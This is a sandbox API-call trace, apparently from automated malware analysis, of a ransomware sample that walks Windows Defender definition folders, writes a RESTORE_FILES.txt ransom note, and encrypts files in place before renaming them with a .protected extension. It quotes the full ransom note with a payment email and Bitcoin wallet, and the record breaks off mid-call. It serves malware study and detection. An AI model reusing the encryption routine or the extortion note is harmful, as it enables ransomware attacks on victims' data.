[0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\.") returned 73 [0071.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.578] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.578] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\..") returned 74 [0071.578] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.578] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.578] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 89 [0071.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.579] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.579] lstrlenA (lpString="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") returned 684 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.579] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.580] CloseHandle (hObject=0xd4) returned 1 [0071.580] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Windows") returned -1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Program Files") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Program Files (x86)") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="$Recycle.bin") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="System Volume Information") returned 1 [0071.580] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 72 [0071.580] lstrcmpW (lpString1="Updates", lpString2=".") returned 1 [0071.580] lstrcmpW (lpString1="Updates", lpString2="..") returned 1 [0071.580] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned 74 [0071.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.580] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.580] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.580] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.581] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.581] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\.") returned 74 [0071.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.581] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.581] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\..") returned 75 [0071.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.581] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.581] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 90 [0071.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.582] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.582] lstrlenA (lpString="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") returned 684 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.582] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.582] CloseHandle (hObject=0xd4) returned 1 [0071.583] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 103 [0071.583] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0071.583] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 105 [0071.583] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.583] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\.") returned 105 [0071.583] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\..") returned 106 [0071.583] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.583] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", 
lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.583] StrStrIW (lpFirst="mpasbase.vdm", lpSrch=".protected") returned 0x0 [0071.583] lstrcmpW (lpString1="mpasbase.vdm", lpString2="RESTORE_FILES.txt") returned -1 [0071.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.583] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.584] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".txt") returned 0x0 [0071.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".rar") returned 0x0 [0071.584] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".zip") returned 0x0 [0071.584] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.586] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.586] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.587] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.587] CloseHandle (hObject=0xd8) returned 1 [0071.588] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected") returned 126 [0071.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition 
updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.protected")) returned 1 [0071.588] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Windows") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Program Files") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Program Files (x86)") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="$Recycle.bin") returned 1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="System Volume Information") returned -1 [0071.588] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.588] StrStrIW (lpFirst="mpasdlta.vdm", lpSrch=".protected") returned 0x0 [0071.588] lstrcmpW (lpString1="mpasdlta.vdm", lpString2="RESTORE_FILES.txt") returned -1 [0071.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.588] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".txt") returned 0x0 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".rar") returned 0x0 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".zip") returned 0x0 [0071.589] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.590] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.590] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.590] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.590] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.592] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.592] CloseHandle (hObject=0xd8) returned 1 [0071.592] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected") returned 126 [0071.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.protected")) returned 1 [0071.592] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Windows") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Program Files") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Program Files (x86)") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="$Recycle.bin") returned 1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="System Volume Information") returned -1 [0071.593] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrIW (lpFirst="mpengine.dll", lpSrch=".protected") returned 0x0 [0071.593] lstrcmpW (lpString1="mpengine.dll", lpString2="RESTORE_FILES.txt") returned -1 [0071.593] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.593] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".txt") returned 0x0 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".rar") returned 0x0 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".zip") returned 0x0 [0071.593] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.595] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, 
